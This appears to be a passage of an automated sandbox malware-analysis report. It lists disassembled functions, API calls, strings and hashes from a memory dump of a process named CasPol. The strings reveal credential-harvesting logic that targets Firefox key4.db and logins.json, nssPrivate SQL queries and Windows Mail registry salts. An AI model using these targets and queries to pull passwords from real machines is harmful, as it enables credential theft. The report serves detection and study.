                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040BECE
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                      • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                      • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                    • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                    • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                    • API String ID: 2303586283-933021314
                                                                                                                                                                                    • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                    • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                                                                                    Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                    • API String ID: 231171946-2189169393
                                                                                                                                                                                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                    Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                    • API String ID: 633282248-1996832678
                                                                                                                                                                                    • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                    Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00406782
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040686E
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                    • memcmp.MSVCRT ref: 004068EC
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                    • memcmp.MSVCRT ref: 004069B2
                                                                                                                                                                                    • memcmp.MSVCRT ref: 004069CA
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00406A4A
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                    • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • key4.db, xrefs: 00406756
                                                                                                                                                                                    • , xrefs: 00406834
                                                                                                                                                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                    • API String ID: 3614188050-3983245814
                                                                                                                                                                                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                    Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                    • API String ID: 710961058-601624466
                                                                                                                                                                                    • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                    • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                    • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                    Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                    • API String ID: 3402215030-3842416460
                                                                                                                                                                                    • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                                    Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000), ref: 00407B6E
                                                                                                                                                                                      • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                      • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                    • API String ID: 2003275452-3138536805
                                                                                                                                                                                    • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                                    • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                                                    Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                    • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                    • API String ID: 1012775001-1343505058
                                                                                                                                                                                    • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                                                                                                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                                    Function 0040CDDA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi
                                                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                    • API String ID: 1439213657-1959339147
                                                                                                                                                                                    • Opcode ID: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                    • Instruction ID: 098916069379b780452bf0adc0bc0339f4c30180c2e3981bbd8ab1a2d20b7c26
                                                                                                                                                                                    • Opcode Fuzzy Hash: bb338ece618d9ae70c262b8390980321f45594aac884b5d85926e37fa653e287
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F01446768576224F924226ABC17F870B44CF91BBAF31015FF519D94D5EF5CA04050AC
                                                                                                                                                                                    Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00444612
                                                                                                                                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                    • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                    • memset.MSVCRT ref: 00444668
                                                                                                                                                                                    • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                    • memset.MSVCRT ref: 00444690
                                                                                                                                                                                    • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                    • String ID: salu
                                                                                                                                                                                    • API String ID: 3691931180-4177317985
                                                                                                                                                                                    • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                    • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                                                    Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll), ref: 00410047
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA,7570CFBC), ref: 00410060
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                    • API String ID: 2449869053-232097475
                                                                                                                                                                                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                                                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                                                    Function 00443AAB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registrystringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                    • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                                                                                    • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                    • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                      • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                    • Salt, xrefs: 00443BA7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                                    • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                    • API String ID: 665470638-2687544566
                                                                                                                                                                                    • Opcode ID: 8fbf4a21aa37e580448f311c320075cae7563dc2be1a8724c18f17f23b444984
                                                                                                                                                                                    • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fbf4a21aa37e580448f311c320075cae7563dc2be1a8724c18f17f23b444984
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                                                                                    Function 00403E96 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                    • memset.MSVCRT ref: 00403ECE
                                                                                                                                                                                    • memset.MSVCRT ref: 00403EE2
                                                                                                                                                                                    • memset.MSVCRT ref: 00403EF6
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F17
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F6A
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F9B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                    • API String ID: 113626815-1670831295
                                                                                                                                                                                    • Opcode ID: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                    • Instruction ID: 68eec6ff6ffa0e14b7f0c60be0e91221167be1d604113ab21f184662466f1ff3
                                                                                                                                                                                    • Opcode Fuzzy Hash: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0931A5B3D00258BEEB50DB54CC82FDE77ACEF54305F1001ABF548A3141DA78AB888B69
